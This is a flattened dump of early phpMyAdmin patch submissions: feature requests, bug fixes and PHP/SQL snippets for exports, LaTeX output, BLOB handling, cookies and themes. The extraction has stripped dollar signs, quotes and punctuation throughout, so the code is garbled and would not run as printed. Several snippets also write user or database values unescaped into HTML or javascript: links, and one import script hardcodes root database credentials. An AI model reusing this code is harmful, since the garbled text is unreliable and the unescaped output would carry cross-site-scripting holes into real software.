i have patched it for my own use the patched version is available here in case upload goes wrong) http 80.55.64.46 lemat zlib.lib.zip feel free to use Sincerelly lemat at tenbit dot pl Original URL https sourceforge.net p phpmyadmin patches 171 https sourceforge.net p phpmyadmin patches 171 Original author anonymous","bug"
"24444","4116","Size of div elements in scratchboard.
Use the following code to make the size of the elements in the scratchboard in line with their actual size on the pdf.
So rather than just the name of the table... give the name of the table and a line with each field name.
Replace the following line line 277?)
in pdf pages.php echo amp;lt;div id= amp;quot;table .
i .
amp;quot; class= amp;quot;pdflayout table amp;quot; amp;gt; .
temp sh page [ table name ] .
amp;lt; div amp;gt; .
amp;quot;\n amp;quot;; With the following code more or less pulled from tbl properties structure.php Get fields local query = SHOW FIELDS FROM .
PMA backquote temp sh page[ table name ] ); fields rs = PMA mysql query local query) or PMA mysqlDie , local query, , err url 0); fields cnt = mysql num rows fields rs); echo amp;lt;div id= amp;quot;table .
i .
amp;quot; class= amp;quot;pdflayout table amp;quot; amp;gt; amp;lt;u amp;gt; .
temp sh page [ table name ] .
amp;lt; u amp;gt; ; while row = PMA mysql fetch array fields rs)) \{ echo amp;quot; amp;lt;br amp;gt; amp;quot;.htmlspecialchars row[ Field ]).
amp;quot;\n amp;quot;; \} echo amp;lt; div amp;gt; .
amp;quot;\n amp;quot;; mysql free result fields rs); Original URL https sourceforge.net p phpmyadmin patches 172 https sourceforge.net p phpmyadmin patches 172 Original author chriswalshaz","bug"
"24444","4117","Fix export of foreign keys.
When importing a database with InnoDB tables, most of the times the tables aren t sorted correctly, so that some foreign key constrains fail.
Starting from version 3.23.52 and 4.0.3, MySQL supports the amp;quot;FOREIGN KEY CHECKS amp;quot; variable.
If this is set to 0 zero), no checks are performed when importing a database.
This means the tables can be sorted in random order.
This patch adds an option box in the amp;quot;Export SQL amp;quot; window that indicates whether you want to disable the foreign key check.
If the option was selected, amp;quot;SET FOREIGN KEY CHECKS=0; amp;quot; will be added to the output.
In attachement, you can find a patch against the CVS repository.
Original URL https sourceforge.net p phpmyadmin patches 173 https sourceforge.net p phpmyadmin patches 173 Original author hinayani","bug"
"24444","4118","Bad Latex output.
When exporting the table structure in Latex, there is no space between the \endfoot command and the first fieldname.
If it is a primary key, this field is enclosed by \textit\{\} and causes no problems.
Otherwise, the field name gets appended to \endfoot, causing errors when processing the document in Latex.
This fix inserts an extra space after \endfoot, resulting in a correct Latex output.
Original URL https sourceforge.net p phpmyadmin patches 174 https sourceforge.net p phpmyadmin patches 174 Original author hinayani","bug"
"24444","4119","Show real database entry of a transformation..
Sometimes it is necessary for users to know that kind of data is behind a transformation.
For example A database entry of type timestamp contains amp;quot;20031120105654 amp;quot;.
The transformed data would be amp;quot;Nov 20, 2003 at 10 56 AM amp;quot; using amp;quot;text plain dateformat amp;quot; as transformation rule.
Adding the following code would make from the transformed entry an link which pops up a javascript alert containing the real database entry.
Further there is a title attribute within the link, so a amp;quot;mouse over amp;quot; over the transformed data will show the real data in a hint box.
Replace line 28 in text plain dateformat.inc.php with the following code Original code options[1] = GLOBALS[ datefmt ]; Patched code db entry = amp;quot; Database entry of this transformation is amp;quot; .
buffer .
amp;quot; amp;quot;; options[1] = amp;lt;a href= amp;quot;javascript alert .
db entry . )
amp;quot; title= .
db entry .
amp;gt; .
GLOBALS[ datefmt ] .
amp;lt; a amp;gt; ; Enchsuch Geu Original URL https sourceforge.net p phpmyadmin patches 176 https sourceforge.net p phpmyadmin patches 176 Original author sysplex","bug"
"24444","4120","Unzip class.
Sent by Holger Boskugel, vbwebprofi gmx.de to add the feature of zip uploading.
Marc Original URL https sourceforge.net p phpmyadmin patches 177 https sourceforge.net p phpmyadmin patches 177 Original author lem9","bug"
"24444","4121","Simple Unzip class.
The class can be used for unziping files from ZIP archive, which are stored in Stored , Deflate or BZIP2 format.
The attached ZIP archive includes class, example and documentation.
Last version can also be found on http www.spheresoft.net development public file for mats zip simpleunzip simpleunzip.zip and http www.spheresoft.net development public file for mats zip simpleunzip documentation.
Original URL https sourceforge.net p phpmyadmin patches 178 https sourceforge.net p phpmyadmin patches 178 Original author vbwebprofi","bug"
"24444","4122","Latex output includes unique key info.
This patch will put fields marked as UNIQUE KEY in bold.
This makes it easy to spot field that have unique values.
It makes use of the SHOW KEYS FROM command.
All fields with Non unique equal to 0 zero) will be listed in bold.
Original URL https sourceforge.net p phpmyadmin patches 175 https sourceforge.net p phpmyadmin patches 175 Original author hinayani","bug"
"24444","4123","PMA getEnumSetOptions ) just in one line.
There is a more cleaner and quicker way to extract the enum ) and set ) types returned by MySQL.
Replace in file common.lib.php the complete body of function PMA getEnumSetOptions ) with the following preg match all amp;quot; \ .
?
)\ amp;quot;, type def, options); return options[1]; Thats all.
This regular expression splits an enum regular customer , in acquirement , former customer ) or set regular customer , in acquirement , former customer ) and extracts everything between the So you get an array like this Array [0] = amp;gt; regular customer [1] = amp;gt; in acquirement [2] = amp;gt; former customer ) Original URL https sourceforge.net p phpmyadmin patches 179 https sourceforge.net p phpmyadmin patches 179 Original author sysplex","bug"
"24444","4124","Better BLOB handling.
From Tony Weber tony otc.net) display tbl.lib.php line 1071 version 2.5.5 rc1) reads condition .= LIKE 0x .
bin2hex row[ pointer]).
AND ; it should be changed to condition .= = CAST 0x .
bin2hex row[ pointer]).
AS BINARY) AND ; Basically, phpMyAdmin converts BLOBs to HEX and uses the LIKE syntax to select.
This is incorrect when the original string contains the characters or or \, which are specially interpreted by LIKE, even when using the hex format.
The solution is to use = instead of LIKE and CAST to binary.
For example, suppose your BLOB is exactly one character, a percent sign, hex 0x25.
select from SomeTable where b like 0x25; this is equivalent to select from SomeTable where b like ; ... and it will select all rows!
use this instead select from SomeTable where b = CAST 0x25 as binary); Best regards, Tony Original URL https sourceforge.net p phpmyadmin patches 180 https sourceforge.net p phpmyadmin patches 180 Original author lem9","bug"
"24444","4125","White space not preserved.
White space is not properly preserved when a query is displayed on the top of a page.
E.g.
the following query UPDATE foo SET bar = A BC DEF G ; is shown as UPDATE foo SET bar = A BC DEF G Consecutive spaces are replaced with one space, as are one or more consecutive line breaks.
This can be fixed by changing line 237 of css phpmyadmin.css.php from .syntax quote \{\} to .syntax quote \{white space pre;\} Original URL https sourceforge.net p phpmyadmin patches 181 https sourceforge.net p phpmyadmin patches 181 Original author c960657","bug"
"24444","4126","display server info off.
I d like to turn off displaying of server info MySQL lt;version gt; running on lt;server port gt; as lt;user host gt; content of variable strMySQLServerProcess).
Possible alternative would be to display only mysql version server info without port and logged user without host or with statically configured host name) Original URL https sourceforge.net p phpmyadmin patches 182 https sourceforge.net p phpmyadmin patches 182 Original author fanto666","bug"
"24444","4127","Unbuffered query while exporting.
Rene Luria lt;operator infomaniak.ch gt; in production on 2.5.5 pl1 since 9jan2004 and used by over 15 000 clients) There is no nead to do a normal mysql query to export data.
The only use of having a normal query instead of an unbuffered one is that it allows to have row count on result set... to decide wether to add ; or , at the end of a line in case of extended insert.
Here s my dirty patch BEGIN diff Naur MySQLAdmin.orig libraries export sql.php MySQLAdmin libraries export sql.php MySQLAdmin.orig libraries export sql.php Thu Dec 11 18 32 42 2003 MySQLAdmin libraries export sql.php Tue Jan 20 17 19 27 2004 385,14 385,14 buffer = ; result = PMA mysql query sql query) or PMA mysqlDie , sql query, , error url); \ field types = PMA fieldTypes db, table, use backquotes); \ result = PMA mysql unbuffered query sql query) or PMA mysqlDie , sql query, , error url); if result != FALSE) \{ fields cnt = mysql num fields result); rows cnt = mysql num rows result); rows cnt = mysql num rows result); get the real types of the table s fields in an array) the key of the array is the backquoted field name field types = PMA fieldTypes db, table, use backquotes); analyze the query to get the true column names, not the aliases this fixes an undefined index, also if Complete inserts 507,9 507,23 \} unset values); if !PMA exportOutputHandler insert line .
isset GLOBALS[ extended ins ]) current row lt; rows cnt)) ?
, ; ) .
crlf)) return FALSE; \ if isset GLOBALS[ extended ins ])) \{ \ if current row gt; 1) \{ \ firstsep = , .
crlf; \ \} else \{ \ firstsep = ; \ \} \ secondsep = ; \ \} else \{ \ firstsep = ; \ secondsep = ; .
crlf; \ \} \ if !PMA exportOutputHandler firstsep .
insert line .
secondsep)) return FALSE; \} end while \ if current row gt; 0) isset GLOBALS[ extended ins ])) \{ \ if !PMA exportOutputHandler ; .
crlf)) return FALSE; \ \} \} end if result != FALSE) mysql free result result); diff Naur MySQLAdmin.orig libraries mysql wrappers.lib.php MySQLAdmin libraries mysql wrappers.lib.php MySQLAdmin.orig libraries mysql wrappers.lib.php Wed Nov 26 23 52 23 2003 MySQLAdmin libraries mysql wrappers.lib.php Tue Jan 20 17 02 14 2004 105,6 105,18 \} \} function PMA mysql unbuffered query query, link identifier = FALSE, result mode = FALSE) \{ \ if link identifier != FALSE) \{ \ if result mode != FALSE) \{ \ return mysql unbuffered query PMA convert charset query), link identifier, result mode); \ \} else \{ \ return mysql unbuffered query PMA convert charset query), link identifier); \ \} \ \} else \{ \ return mysql unbuffered query PMA convert charset query)); \ \} \} \ mysql list tables ) is deprecated, also we got report about weird results under some circumstances END Original URL https sourceforge.net p phpmyadmin patches 185 https sourceforge.net p phpmyadmin patches 185 Original author anonymous","bug"
"24444","4128","Sync tables on different servers.
I needed a basic quick way to sync data from my laptop to a remote site ....
This patch allows you to add a Sync Table to the Operations feature and pick one main server and feed another server with table data.
Original URL https sourceforge.net p phpmyadmin patches 183 https sourceforge.net p phpmyadmin patches 183 Original author jonbaer","bug"
"24444","4129","fix last published and future injection problems.
Rene Luria lt;operator infomaniak.ch gt; in production on 2.5.5 pl1 since 9jan2004 and used by over 15 000 clients) libraries common.lib.php Wed Feb 4 00 21 16 2004 libraries common.lib.php.new Wed Feb 4 00 31 31 2004 1882,6 1882,8 if !isset GLOBALS[ param])) \{ error message .= reported script name .
Missing .
param .
lt;br gt; ; found error = TRUE; \ \} else \{ \ GLOBALS[ param] = preg replace \.\.
, .
, GLOBALS[ param]); \} \} if found error) \{ Original URL https sourceforge.net p phpmyadmin patches 184 https sourceforge.net p phpmyadmin patches 184 Original author anonymous","bug"
"24444","4130","Use HTML entities for language files.
Jean Claude.COLSON scd.univ metz.fr I have replaced all non ASCII with ????
; to obtain lang french.inc.php and put this line fr = gt; array fr [ ][[ alpha ]]\{2\})?|french , french , fr ), in select lang.lib.php.
Now I can use phpMyAdmin with any character coding and see correctly all messages diff phpMyAdmin libraries select lang.lib.php phpMyAdmin 2.5.6 rc1 libraries select lang.lib.php 90a91 gt; fr = gt; array fr [ ][[ alpha ]]\{2\})?|french , french , fr ), Use of HtmlEntities to view all thinks good I don t understand exactly line 141 = gt; hard comment) diff phpMyAdmin libraries charset conversion.lib.php phpMyAdmin 2.5.6 rc1 libraries charset conversion.lib.php 141c141 lt; if !
isset cfg[ AllowAnywhereRecoding ]) cfg[ AllowAnywhereRecoding ] allow recoding) gt; if !
isset cfg[ AllowAnywhereRecoding ]) cfg[ AllowAnywhereRecoding ] allow recoding) 144,145c144,145 lt; \} lt; else if is array what)) \{ gt; \} gt; if is array what)) \{ 169c169,170 lt; return what; gt; JC 20040208 add HtmlEntities gt; return HtmlEntities what); 187c188 lt; return what; gt; return HtmlEntities what); And two errors To view table s names correctly diff phpMyAdmin db details structure.php phpMyAdmin 2.5.6 rc1 db details structure.php219a220 gt; JC 20040208 htmlspecialchars isn t needed for tooltip name 221c222 lt; ?
htmlspecialchars tooltip aliasname[ table]) gt; ?
tooltip aliasname[ table] 224c225 lt; ?
htmlspecialchars tooltip truename[ table]) gt; ?
tooltip truename[ table] 251c252 lt; amp;nbsp; lt;b gt; lt;label for= checkbox tbl lt;?php echo i; ?
gt; title= lt;?php echo alias; ?
gt; gt; lt;?php echo truename; ?
gt; lt; label gt; amp;nbsp; lt; b gt; amp;nbsp; gt; amp;nbsp; lt;b gt; lt;label for= checkbox tbl lt;?php echo i; ?
gt; title= lt;?php echo alias; ?
gt; gt; lt;?php echo PMA convert display charset truename); ?
gt; lt; label gt; amp;nbsp; lt; b gt; amp;nbsp; And to view data correctly diff phpMyAdmin libraries display tbl.lib.php phpMyAdmin 2.5.6 rc1 libraries display tbl.lib.php 1371c1369,1370 lt; vertical display[ data ][ row no][ i] = lt;td valign= top .
column style .
bgcolor= .
bgcolor .
gt; .
row[ pointer] .
lt; td gt; .
\n ; gt; JC 20040208 Add PMA convert display charset gt; vertical display[ data ][ row no][ i] = lt;td valign= top .
column style .
bgcolor= .
bgcolor .
gt; .
PMA convert display charset row[ pointer]) .
lt; td gt; .
\n ; Original URL https sourceforge.net p phpmyadmin patches 186 https sourceforge.net p phpmyadmin patches 186 Original author anonymous","bug"
"24444","4131","Site configurable header and footer.
The phpMyAdmin missing real site configurable header and footer.
I d like to get simple branded phpMyAdmin with corporate logo, MOTD, etc.
The modification of header.inc.php and footer.inc.php is a bad thing as far as I ll lost my modifications in next upgrade.
This is simple config.header.inc.php and config.footer.inc.php lt;!
config.header.inc.php gt; lt;?php In this file you may add PHP or HTML statements that will be used to define the header for phpMyAdmin pages.
?
gt; lt;table border= 0 bgcolor= e0e0f0 gt; lt;tr gt; lt;td bgcolor= ffffff gt; lt;img src= http www.debian.org Pics debian.jpg gt; lt; td gt; lt; tr gt; lt;tr gt; lt;td gt; lt;!
config.footer.inc.php gt; lt;?php In this file you may add PHP or HTML statements that will be used to define the footer for phpMyAdmin pages.
?
gt; lt; td gt; lt; tr gt; lt; table gt; Original URL https sourceforge.net p phpmyadmin patches 187 https sourceforge.net p phpmyadmin patches 187 Original author d3xter","bug"
"24444","4132","multi server labelling.
We would like to see a feature added so that an admin can easily add a label to the servers when using the multi server option.
I m sorry I m not quite posting this in diff patch format, but the changes are nearly trivial libraries auth cookie.auth.lib.php line 330 lt;echo amp;nbsp; lt; option gt; .
\n ; gt;echo amp;nbsp; ; gt;if !empty val[ label ]) \{ gt; echo .
val[ label ]. )
; gt;\} gt;echo lt; option gt; .
\n ; config.inc.php line 69 gt; cfg[ Servers ][ i][ label ] = ; We re thinking that this will dramatically add to the usefulness and readability of the server choices that the sysadmin supplies, and most importantly will greatly reduce the amount of local patching that we ll need to do.
Thanks Willie Northway, University of Michigan Webmaster Team Original URL https sourceforge.net p phpmyadmin patches 188 https sourceforge.net p phpmyadmin patches 188 Original author anonymous","bug"
"24444","4133","Display foreign keys values while browsing.
I would like the option to see my related table information in the table instead of as a tooltip.
This is referring to the browse select results view.
example lt;A HREF= [link] gt;1 lt; A gt; Dave instead of lt;A HREF= [link] TITLE= Dave gt;1 lt; A gt; Perhapse also, the ability to limit the amount of text displayed example lt;A HREF= [link] TITLE= Some really long text.
gt;1 lt; A gt; Some really ...
I would be willing to work on the implimentation of this feature.
Original URL https sourceforge.net p phpmyadmin patches 189 https sourceforge.net p phpmyadmin patches 189 Original author etherealsys","bug"
"24444","4134","when import breaks.
i alway have the problem the get a correct data dump form my ISP mysqlfront has bugs to copy data to my localhost or anywhere else... but first i get the stucture and the data seperated then using this piece of code to get the data in my DB.
phpmyadmin always break at any point... lt;?php ========================================== ======================== === flobee for universal artists.de === ========================================== ======================== sql data file = dump data file.sql ; db = databasename ; === mysql insert data dump to mysql ========================================== ========= function insert db data dump ) \{ global db, sql data file; ignore user abort false); ini set max execution time ,0); dbc = mysql connect localhost , root , password ) or die mysql error ) ); mysql select db db, dbc ); lines = file sql data file ); a = count lines); echo lt;p gt;entrys .
a.
PLEASE WAIT!!!
lt; p gt; ; flush ); for i=0; i lt; a; i ) \{ pin = substr lines[ i],0,1); if pin != pin != !empty pin) pin gt; !empty lines[ i])) \{ mysql query lines[ i], dbc); if err = mysql error ) mysql errno ) != 1062 ) \{ echo line i ,test test, error err , query .
lines[ i]; exit EXIT ); \} if is int i 1000) ) \{ echo i .
, ; flush ); \} \} \} if i gt;= a) \{ echo lt;p gt;DONE!
exit... lt; p gt; ; exit OK ); \} \} insert db data dump ); ?
gt; Original URL https sourceforge.net p phpmyadmin patches 190 https sourceforge.net p phpmyadmin patches 190 Original author flobee","bug"
"24444","4135","a patch to search faster in one table.
i move this here from the help forum i posted it there before on http sourceforge.net forum forum.php?thread id=1053187 forum id=72909 ) usually if you use the search function in phpmyadmin, you write a word and every time, you have to add the before and after the searchword.
this should be optional for non text fields.
LIKE should be the second option and a new option is fist search which just means, that you don`t have to add the to add it to your myadmin, change this in the script tbl select.php change line 39 from textfunctions = array LIKE , = , != ); to textfunctions = array search , LIKE , = , != ); and add this if func[ i]== search ) \{ func[ i]= LIKE ; fields[ i]= .
fields[ i].
; \} to line 282, before sql query .= AND .
PMA backquote urldecode names[ i])) .
.
func[ i] .
.
quot .
PMA sqlAddslashes fields[ i]) .
quot; Original URL https sourceforge.net p phpmyadmin patches 191 https sourceforge.net p phpmyadmin patches 191 Original author rubo77","bug"
"24444","4136","bookmarkeable search page for one table.
i move this here from the help forum i posted it there before on http sourceforge.net forum forum.php?thread id=1053187 forum id=72909 ) a new button at the bottom to open a new window with 2 frames, top the tbl select.php and bottom the results of that page would be nice.
i solved that in a first beta version, but it works this is the frameset called selectframes.php lt;!DOCTYPE HTML PUBLIC W3C DTD HTML 4.01 Transitional EN gt; lt;html gt; lt;head gt; lt;title gt;Select lt; title gt; lt; head gt; lt;frameset rows= 30 , gt; lt;frame name= select top src= lt;?php echo GET[tbl select url]; ?
gt; frameview=true marginwidth= 10 marginheight= 10 scrolling= auto frameborder= 0 gt; lt;frame name= select bottom src= blank.html marginwidth= 10 marginheight= 10 scrolling= auto frameborder= 0 gt; lt; frameset gt; lt;body gt; lt; body gt; lt; html gt; and i added this at the end of tbl select.php LINE 91 before the beginning of the lt;form gt; if frameview) \{ ?
gt; lt;table cellpadding= 0 cellspacing= 0 border= 0 gt; lt;tr gt; lt;td valign= top gt; lt;?
\} in the lt;form gt; i added this lt;form method= get action= tbl select.php name= insertForm lt;?php if frameview) echo target= select bottom ; ?
gt; gt; in the middle of the script after lt;?php echo PMA showMySQLDocu Reference , Functions ) .
\n ; ?
gt; lt;br gt; lt;br gt; lt;?php i added if frameview) \{ ?
gt; lt; td gt; lt;td valign= top gt; lt;?
\} and at the bottom after lt; form gt; lt;?php if frameview) \{ ?
gt; lt; td gt; lt; tr gt; lt; table gt; lt;?
\} else \{ ?
gt; lt;br gt; lt;form method= get action= selectframes.php target= selectframes gt; lt;b gt;Open this page in frame view lt; b gt; lt;br gt; lt;br gt; lt;input type= Hidden name= tbl select url value= lt;?php echo str replace , amp;quot; , PHP SELF.
?
.
QUERY STRING); ?
gt; gt; lt;?php echo PMA generate common hidden inputs db, table); ?
gt; amp;nbsp; amp;nbsp; amp;nbsp; amp;nbsp; amp;nbsp; Select Fields, that should be shown in frame view at lease one) amp;nbsp; lt;br gt; amp;nbsp; amp;nbsp; amp;nbsp; amp;nbsp; amp;nbsp; lt;select name= param[] size= lt;?php echo fields cnt lt; 10) ?
fields cnt 10; ?
gt; multiple= multiple gt; lt;?php echo \n ; Displays the list of the fields for i = 0 ; i lt; fields cnt; i ) \{ echo lt;option value= .
htmlspecialchars fields list[ i]) .
selected= selected gt; .
htmlspecialchars fields list[ i]) .
lt; option gt; .
\n ; \} ?
gt; lt; select gt; lt;input type= submit name= submit value= lt;?php echo strGo; ?
gt; gt; lt; form gt; lt;?php \} i added this lt;select name= param[] .... because it would be nice to select the fields that should be shown in the new window.
it would be also nice to get rid of the standard header in the new window, because then it uses less space.
but this is enough for now ) this whole feature is nice if you want to have a small admin interface just for one table.
you can directly bookmark the url this way Original URL https sourceforge.net p phpmyadmin patches 192 https sourceforge.net p phpmyadmin patches 192 Original author rubo77","bug"
"24444","4137","Sync selected tables between two databases.
Able to select tables from a source database and copy their structure and data to a destination database.
Original URL https sourceforge.net p phpmyadmin patches 193 https sourceforge.net p phpmyadmin patches 193 Original author mshawnb","bug"
"24444","4138","Redesign.
Hello, I ve tested some modifications with PMA version 2.5.3 and made some new symbols and styles.
new icons new colors some scripts some layouts It seems sometimes a little buggie but I m patching now the newest version current 2.6.0).
It s mainly made as a demo and development for supporting themes and some new features.
NOTE This version only includes English and German languages.
Sorry ... ...
But the many others are not needed for my clients.
Perhaps you may be able to patch the languages from the original version may be newer version).
Todo including an HTML Editor for long text into fields) some JS Bugs fixes static table headers perhabs customizable column width put header Navigation, Database Info) in extra frame split the table proberties in multiple frames drag and drop for building queries like MS Access) Best regards Michael Keck Original URL https sourceforge.net p phpmyadmin patches 194 https sourceforge.net p phpmyadmin patches 194 Original author mkkeck","bug"
"24444","4139","Minor xHTML CSS validation patch.
Attached is a minor patch to make sure things render properly in various browsers using W3C s xHTML CSS standards.
Let me know if this needs to be in a different format, or if I should submit it somewhere else.
Thanks!
Adam Original URL https sourceforge.net p phpmyadmin patches 195 https sourceforge.net p phpmyadmin patches 195 Original author musus","bug"
"24444","4140","support for .htaccess.
From David.Chesnet mshs.univ poitiers.fr I was annoyed not to be able to use .htaccess security with my apache server on Linux Red Hat).
So I made a htaccess.auth.lib.php and declared htaccess as an authentication mode in config.inc.php to fullfill my needs.
Please find that file as an attachment to his email.
You ll see that the modification I made, based on the original http.auth.lib.php is very light .
If it can help other users, or even enhance phpMyAdmin, i would be happy.
Original URL https sourceforge.net p phpmyadmin patches 202 https sourceforge.net p phpmyadmin patches 202 Original author lem9","enhancement"
"24444","4141","Different cookies for multi server configuration.
After setting up an instance of PMA to deal with multiple servers, we became frustrated with, among other things, the inability to easily switch back and forth between servers without needing to login again when using the cookie auth method for multiple servers).
The cookie method, by default, uses cookie names general to that installation of PMA, so the cookie gets continuously overwritten.
This version of cookies.auth.lib.php simply prepends the server number to the cookies, allowing each server to retain a separate cookie username and password.
Original URL https sourceforge.net p phpmyadmin patches 196 https sourceforge.net p phpmyadmin patches 196 Original author damaget","bug"
"24444","4142","fix some warnning for some situation empty result).
cvs diff Diffing .
Index mysql.dbi.lib.php ========================================== ========================= RCS file cvsroot phpmyadmin phpMyAdmin libraries dbi mysql .dbi.lib.php,v retrieving revision 2.25 diff u r2.25 mysql.dbi.lib.php mysql.dbi.lib.php 20 May 2004 16 14 12 0000 2.25 mysql.dbi.lib.php 23 May 2004 15 51 11 0000 145,6 145,8 || !
isset cfg[ AllowAnywhereRecoding ]) cfg [ AllowAnywhereRecoding ] allow recoding)) \{ No recoding gt; return data as we got them return data; \ \} else if !
data) \{ \ return data; \} else \{ ret = array ); num = mysql num fields result); similar modify should be apply to mysqli.dbi.lib.php but i can t test with it Original URL https sourceforge.net p phpmyadmin patches 197 https sourceforge.net p phpmyadmin patches 197 Original author xuefer","bug"
"24444","4143","alternative order of FIELD TYPE.
=======config.inc.php add cfg[ ColumnTypes UseShortcut ] = TRUE; if cfg[ ColumnTypes UseShortcut ]) \{ cfg[ ColumnTypes Shortcuts ] = array TINYINT = gt; x. , SMALLINT = gt; q. , MEDIUMINT = gt; n. , INT = gt; i , BIGINT = gt; a. , FLOAT = gt; f. , DOUBLE = gt; g , DECIMAL = gt; j. , DATE = gt; d , DATETIME = gt; h. , TIMESTAMP = gt; r. , TIME = gt; s. , YEAR = gt; y. , VARCHAR = gt; v. , CHAR = gt; c , ENUM = gt; e. , SET = gt; s. , TINYTEXT = gt; w. , TINYBLOB = gt; u. , TEXT = gt; t , BLOB = gt; b , MEDIUMTEXT = gt; m. , MEDIUMBLOB = gt; o. , LONGTEXT = gt; l. , LONGBLOB = gt; k. , ); \} ============ and with a patch for tbl properties.inc.phptbl properties.inc.php Original URL https sourceforge.net p phpmyadmin patches 198 https sourceforge.net p phpmyadmin patches 198 Original author xuefer","bug"
"24444","4144","Fix for zh cn language detection.
2 patch Original URL https sourceforge.net p phpmyadmin patches 199 https sourceforge.net p phpmyadmin patches 199 Original author xuefer","bug"
"24444","4145","New Placeholder c for default queries.
In config.inc.php, cfg[ DefaultQueryTable ] is SELECT FROM t WHERE 1 where t is the table name.
This makes the default query for example SELECT FROM people WHERE 1 Instead, I want as the default query SELECT name, email, phone FROM people WHERE 1 To make this possible, I added a new placeholder c which produces the result above.
All the diff s needed can be found in the attachement including changes for the config and the Documentation files).
Original URL https sourceforge.net p phpmyadmin patches 200 https sourceforge.net p phpmyadmin patches 200 Original author mados","bug"
"24444","4146","Proper handling of comments in SQL file upload.
From the MySQL documentation, it is possible to follow the comment mark with any control character not just space).
This is not currently handled properly by the SQL parser.
Also empty comment lines extend to the next line...
This patch fixes these problems for version 2.5.5) Original URL https sourceforge.net p phpmyadmin patches 201 https sourceforge.net p phpmyadmin patches 201 Original author anonymous","bug"
"24444","4147","Simplify row highlighting via CSS.
It s amazing how PMA has improved, great job you are doing guy, thanks.
I m much excited about the new design ) My concern I built in the table highlighting code JS) in a project of mine, but had to disable the TD highlighting part as I had another table embedded and the code does colorize all TDs, so it looked like it disappeared because it was all in one color).
I then tried out some CSS stuff and it made the whole complex) JS script unnecessary In the CSS, I just added a style for the TR like tr hover \{ background color CCFF33; \} and that s it!
I m not shure if it s really compilant, but it works for Mozilla and saves a lot of code..
Original URL https sourceforge.net p phpmyadmin patches 203 https sourceforge.net p phpmyadmin patches 203 Original author koyaanisq","bug"
"24444","4148","Just a little patch.
Hi.
This is my first patch, so it s very small, to see if I ve done it right.
Please let me know if there s anything I can do to make future patches easier better.
Changes in this patch fixed links to readme, changelog, and license in the documentation so that they use a php wrapper script.
this allows them to display in the browser instead of downloading) even on servers set to deliver binary files by default.
also ensures proper charset.
expands the fix for bug report 965548) in create release changed name of backup config file so it ends with .php extension so editors with syntax highlighting still highlight it correctly.
handles my latest comment in feature request 968177) added per theme config.header and config.footer closes feature request 984152) added a class to the table surrounding the server info, so it can be changed in a theme fixed a typo in the stylesheets fixed some misspellings in the comments In addition to applying the diff, readme.php and license.php should be copied into the main phpMyAdmin directory, and config.header.inc.php and config.footer.inc.php should be copied into themes original and themes darkblue orange.
These two config files are empty, but should probably still be placed in each theme s directory, so that authors of other themes will be aware of this capability.
Original URL https sourceforge.net p phpmyadmin patches 204 https sourceforge.net p phpmyadmin patches 204 Original author ryandesign","bug"
"24444","4149","Display relTable content instead origin val solution incl!.
Please add this feature to the main trunck, I guess this is very usefull if someone needs.
If relations are set default table browse function shows the value of actual field and if I move mouse over it than appears the value of Field to display field of assigned relational table s. In my daily work I would prefer seeing that value right away and the origin value is enough to display in the popup.
So I hacked it like this added new configuration value it is up to you how you would like to call it cfg[ FlipRelationDisplay ] = TRUE; FALSE=ordinary display modified display tbl.lib.php from 1299 Field to display from the foreign table?
if !empty map[ meta gt;name][2])) \{ dispsql = SELECT .
PMA backquote map[ meta gt;name][2]) .
FROM .
PMA backquote map[ meta gt;name][3]) .
.
.
PMA backquote map[ meta gt;name][0]) .
WHERE .
PMA backquote map[ meta gt;name][1]) .
= .
row[ pointer]; dispresult = PMA mysql query dispsql); if dispresult mysql num rows dispresult) gt; 0) \{ added from here by robsipos freemail.hu if GLOBALS[ cfg ][ FlipRelationDisplay ]) \{ dispval = row[ pointer]; row[ pointer]=PMA mysql result dispresult, 0); \} else dispval =PMA mysql result dispresult, 0); added to here by robsipos freemail.hu \} else \{ dispval = GLOBALS[ strLinkNotFound ]; \} \} else \{ dispval = ; \} end if... else... if isset GLOBALS[ printview ]) GLOBALS[ printview ] == 1 ) \{ vertical display[ data ][ row no][ i] .= transform function != default function ?
transform function row[ pointer], transform options, meta) transform function row[ pointer], array ), meta)) .
lt;code gt;[ amp;gt; .
dispval . ]
lt; code gt; ; \} else \{ title = !empty dispval))?
title= .
htmlspecialchars dispval) .
; vertical display[ data ][ row no][ i] .= lt;a href= sql.php?
.
PMA generate common url map[ meta gt;name][3], map[ meta gt;name][0]) .
amp;amp;pos=0 amp;amp;session max rows= .
session max rows .
amp;amp;dontlimitchars= .
dontlimitchars; added from here by robsipos freemail.hu if GLOBALS[ cfg ][ FlipRelationDisplay ]) vertical display[ data ][ row no][ i] .= amp;amp;sql query= .
urlencode SELECT FROM .
PMA backquote map[ meta gt;name][0]) .
WHERE .
PMA backquote map[ meta gt;name][1]) .
= .
dispval) .
.
title .
gt; ; else vertical display[ data ][ row no][ i] .= amp;amp;sql query= .
urlencode SELECT FROM .
PMA backquote map[ meta gt;name][0]) .
WHERE .
PMA backquote map[ meta gt;name][1]) .
= .
row[ pointer]) .
.
title .
gt; ; vertical display[ data ][ row no][ i] .= transform function != default function ?
transform function row[ pointer], transform options, meta) transform function row[ pointer], array ), meta)) .
lt; a gt; ; added to here by robsipos freemail.hu \} \} else \{ vertical display[ data ][ row no][ i] .= transform function != default function ?
transform function row[ pointer], transform options, meta) transform function row[ pointer], array ), meta)); \} vertical display[ data ][ row no][ i] .= lt; td gt; .
\n ; \} else \{ vertical display[ data ][ row no][ i] = lt;td align= right .
column style .
valign= top bgcolor= .
bgcolor .
nowrap= nowrap gt; amp;nbsp; lt; td gt; .
\n ; \} b l o b ==================================== Best regards, Robert Sipos robsipos freemail.hu Original URL https sourceforge.net p phpmyadmin patches 205 https sourceforge.net p phpmyadmin patches 205 Original author anonymous","bug"
"24444","4150","Fix for Theme Manager Popup.
In Firefox when clicking on the Theme Manager it opens in a popup AND in the window where pma is in.
This is a small patch to fix this.
Perhaps this issue is somehow related to my firefox settings extensions.
I have configured it to use single browser mode.
It opens every new Window except for JS popups in a new tab.
Original URL https sourceforge.net p phpmyadmin patches 206 https sourceforge.net p phpmyadmin patches 206 Original author swatinem","bug"
"24444","4151","Add comments to processlist queries.
This patch adds some basic debugging information for the processlist.
It prepends additive to mysql queries so that the admin or viewers of the processlist) can see what is executing the query, and what IP is executing it.
This would be useful for repeated DoS attempts from hosts.
Patch is below, applied against 2.5.6. mysql wrappers.lib.php.orig 2004 08 24 12 56 13.000000000 0000 mysql wrappers.lib.php 2004 08 24 12 57 30.000000000 0000 94,14 94,15 \} function PMA mysql query query, link identifier = FALSE, result mode = FALSE) \{ if link identifier != FALSE) \{ \ additive = phpMyAdmin .getenv REMOTE ADDR ).
